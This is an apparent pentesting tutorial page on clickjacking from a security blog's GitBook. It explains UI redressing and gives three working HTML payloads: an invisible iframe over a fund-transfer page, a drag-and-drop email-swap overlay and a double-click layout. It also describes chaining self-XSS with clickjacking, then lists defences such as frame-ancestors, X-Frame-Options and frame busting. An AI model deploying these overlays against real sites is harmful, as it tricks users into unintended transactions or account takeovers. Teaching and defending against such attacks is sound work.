🕵️
VeryLazyTech
📜 Medium🛒 My Shop👾 Github📩 Telegram 📺 YouTube✖ Twitter
  • 🕵️Welcome!
    • VeryLazyTech
    • Support VeryLazyTech
      • 👾 GitHub
      • 📜 Medium
      • ☕ My Shop
      • 📺 YouTube
      • ✖ Twitter
      • 📩 Telegram
  • 🛡️ Vulnerabilities and Exploits
    • CVE - POC
      • Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692
      • POC - CVE-2024–4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal
      • POC - CVE-2024-45241: Path Traversal in CentralSquare's CryWolf
      • Telerik Auth Bypass CVE-2024-4358
      • Check Point Security Gateways Information Disclosure - CVE-2024-24919
      • CVE-2024-23897 - Jenkins File Read Vulnerability
      • CVE-2024–10914- Command Injection Vulnerability in name parameter for D-Link NAS
      • POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE)
      • CVE-2024-9935 - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary
      • CVE-2024-50623- Cleo Unrestricted file upload and download
      • POC - WordPress File Upload plugin, in the wfu_file_downloader.php file before version <= 4.24.11
      • POC - Remote and unauthenticated attacker can send crafted HTTP requests to RCE - cve-2025-3248
      • POC - CVE-2025–2539 File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File
      • POC - CVE-2025-29306 FOXCMS /images/index.html Code Execution Vulnerability
  • 🕵️‍♂️Dorks
    • GitHub Dorks
    • Google Dork Online Tool
  • 📚 Resources
    • Top Hacking Books for 2024: FREE and Paid
    • How to Study for OSCP with the PWK Book PDF
    • Top 20 phishing tools to use in 2024
    • Top 8 Bug Bounty Books for 2025: Must-Reads for Ethical Hackers
    • Top Hacking Tools and Skills You Need to Learn in 2025
    • Offensive Cloud
    • Penetration Testing & Hacking Tools List
    • Top Cybersecurity Books by Topic
  • The Ultimate Penetration Testing Methodology (2025 Edition)
  • 🕸️Pentesting Web
    • Client Side Template Injection (CSTI)
    • Identify a Server’s Origin IP
    • 2FA/MFA/OTP Bypass
  • IDOR
  • Open Redirect
  • Subdomain Takeover
  • Penetration Testing WiFi Networks
  • Client-Side Path Traversal
  • Clickjacking
  • Command Injection
  • JWT Vulnerabilities
  • Bypass rating limit
  • CORS - Misconfigurations & Bypass
  • LDAP Injection
  • File upload vulnerabilities
  • Content Security Policy (CSP) bypass
  • 🐧Linux
    • Practical Linux Commands
    • Bypassing Bash Restrictions - Rbash
    • Privilege escalation - Linux
  • Linux Environment Variables
  • 🪟Windows
    • Active Directory Methodology
  • 🌐Network Pentesting
    • FTP - Port 21
    • SSH- Port 22
    • Telnet - Port 23
    • SMTP/s - Port 25,465,587
    • WHOIS - Port 43
    • TACACS+ - Port 49
    • DNS - Port 53
    • TFTP/Bittorrent-tracker - Port 69/UDP
    • Finger - Port 79
    • Web - Port 80,443
    • Kerberos - Port 88
    • POP - Port 110/995
    • Portmapper - Port 111/TCP/UDP
    • Ident - Port 113
    • NTP - Port 123/UDP
    • MSRPC - Port 135, 539
    • NetBios - Port 137,138,139
    • SMB - Port 139 445
    • IMAP - Port 143, 993
    • SNMP - Ports 161, 162, 10161, and 10162/UDP
    • IRC - Ports 194,6667,6660-7000
    • Check Point Firewall - Port 264
    • LDAP - Ports 389, 636, 3268, 3269
    • IPsec/IKE VPN - Port 500/UDP
    • Modbus - Port 502
    • Rexec - Port 512
    • Rlogin - Port 513
    • Rsh - Port 514
    • Line Printer Daemon (LPD) - Port 515
    • Apple Filing Protocol (AFP) - PORT 548
    • RTSP - Port 554, 8554
    • IPMI - Port 623/UDP/TCP
    • Internet Printing Protocol (IPP) - Port 631
    • EPP - Port 700
    • Rsync - Port 873
    • Rusersd Service - Port 1026
    • Socks - Port 1080
    • Java RMI - RMI-IIOP - Port 1098/1099/1050
    • MSSQL (Microsoft SQL Server) - Port 1433
    • Oracle TNS Listener - Port 1521,1522-1529
  • PPTP - Port 1723
  • MQTT (Message Queuing Telemetry Transport) - Port 1883
  • Compaq HP Insight Manager - Port 2301, 2381
  • NFS Service - Port 2049
  • Docker - Port 2375,2376
  • Squid - Port 3128
  • iScsi - Port 3260
  • SAPRouter - Port 3299
  • 😎Post-exploitation
    • File Transfer Cheatsheet: Windows and Linux
  • 🧑‍🔧Technical guides
    • Kali Linux - Installation
Powered by GitBook
On this page
  • Basic info
  • What is Clickjacking?
  • How Clickjacking Works
  • Common Clickjacking Exploits
  • 1. Prepopulate Forms Trick
  • 2. Drag & Drop Exploit
  • 3. Basic Clickjacking Payload
  • 4. XSS + Clickjacking Attack
  • 5. DoubleClickjacking
  • How to Prevent Clickjacking
  • Client-Side Defenses
  • Server-Side Protections

Was this helpful?

Clickjacking

Explore clickjacking attacks with VeryLazyTech—techniques, exploits, and lazy prevention tips!

PreviousClient-Side Path TraversalNextCommand Injection

Last updated 2 months ago

Was this helpful?

  • Become VeryLazyTech ! 🎁

  • Follow us on:

    • ✖ Twitter .

    • 👾 Github .

    • 📜 Medium .

    • 📺 YouTube .

    • 📩 Telegram .

    • 🕵️‍♂️ My Site .

  • Visit our for e-books and courses. 📚

Basic info

Clickjacking, also known as UI redressing, is a deceptive cyber attack where users are tricked into clicking on hidden UI elements, performing unintended actions. Attackers leverage iframes and CSS opacity tricks to overlay malicious content on legitimate pages, leading to data theft, account takeovers, or spreading malware.

In this guide, we'll explore how Clickjacking works, real-world attack scenarios, and prevention strategies to mitigate this web security threat.


What is Clickjacking?

Clickjacking is an attack where a victim is tricked into clicking something different than what they perceive. This technique exploits web page layering, allowing attackers to load invisible or disguised UI components over a trusted page.

How Clickjacking Works

  1. A victim visits a seemingly harmless webpage.

  2. The page embeds an invisible or disguised iframe containing a sensitive action (e.g., enabling a webcam, making a purchase, or liking a post).

  3. The victim interacts with the webpage, unknowingly triggering the hidden action.

  4. The attacker gains access to the unintended action, often leading to security breaches.


Common Clickjacking Exploits

Clickjacking attacks vary in complexity, combining JavaScript, CSS, and social engineering tactics. Below are some common exploit techniques:

1. Prepopulate Forms Trick

Attackers overlay an invisible login form over a trusted page. When the victim clicks anywhere, they unknowingly submit credentials.

2. Drag & Drop Exploit

This technique forces users to drag a disguised malicious element, dropping it into a sensitive area (e.g., file upload, email attachment submission).

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

3. Basic Clickjacking Payload

<!DOCTYPE html>
<html>
<head>
    <style>
        iframe {
            position: absolute;
            opacity: 0;
            z-index: 999;
            width: 100%;
            height: 100%;
        }
    </style>
</head>
<body>
    <h1>Click the button below</h1>
    <button>Win a Prize!</button>
    <iframe src="https://victim-site.com/transfer-funds"></iframe>
</body>
</html>

In this example, clicking the button actually submits a hidden transaction.

4. XSS + Clickjacking Attack

If you have identified an XSS attack that requires a user to click on some element to trigger the XSS and the page is vulnerable to clickjacking, you could abuse it to trick the user into clicking the button/link.

Example: You found a self XSS in some private details of the account (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking and you can prepopulate the form with the GET parameters. An attacker could prepare a Clickjacking attack to that page prepopulating the form with the XSS payload and tricking the user into Submit the form. So, when the form is submitted and the values are modified, the user will execute the XSS.

5. DoubleClickjacking

A deceptive technique requiring two clicks: the first click aligns the hidden button, and the second executes the action.

<style>
   iframe {
       position:relative;
       width: 500px;
       height: 500px;
       opacity: 0.1;
       z-index: 2;
   }
   .firstClick, .secondClick {
       position:absolute;
       top:330px;
       left:60px;
       z-index: 1;
   }
   .secondClick {
       left:210px;
   }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

How to Prevent Clickjacking

Client-Side Defenses

1. Content Security Policy (CSP)

Use frame-ancestors directive to prevent embedding:

Content-Security-Policy: frame-ancestors 'none';

2. X-Frame-Options Header

Blocks the site from being loaded in an iframe:

X-Frame-Options: DENY

3. Frame Busting JavaScript

if (window.self !== window.top) {
    document.body.innerHTML = '';
    alert("Clickjacking attempt detected!");
}

Server-Side Protections

  • Set secure HTTP headers.

  • Implement user interaction validation (e.g., CAPTCHAs).

  • Use SameSite cookies to prevent cross-origin access.


Support VeryLazyTech 🎉
  • Follow us on:

Learn & practice

Become VeryLazyTech ! 🎁

✖ Twitter .

👾 Github .

📜 Medium .

📺 YouTube .

📩 Telegram .

🕵️‍♂️ My Site .

Visit our for e-books and courses. 📚

member
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
shop
For the OSCP.
member
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
@VeryLazyTech
shop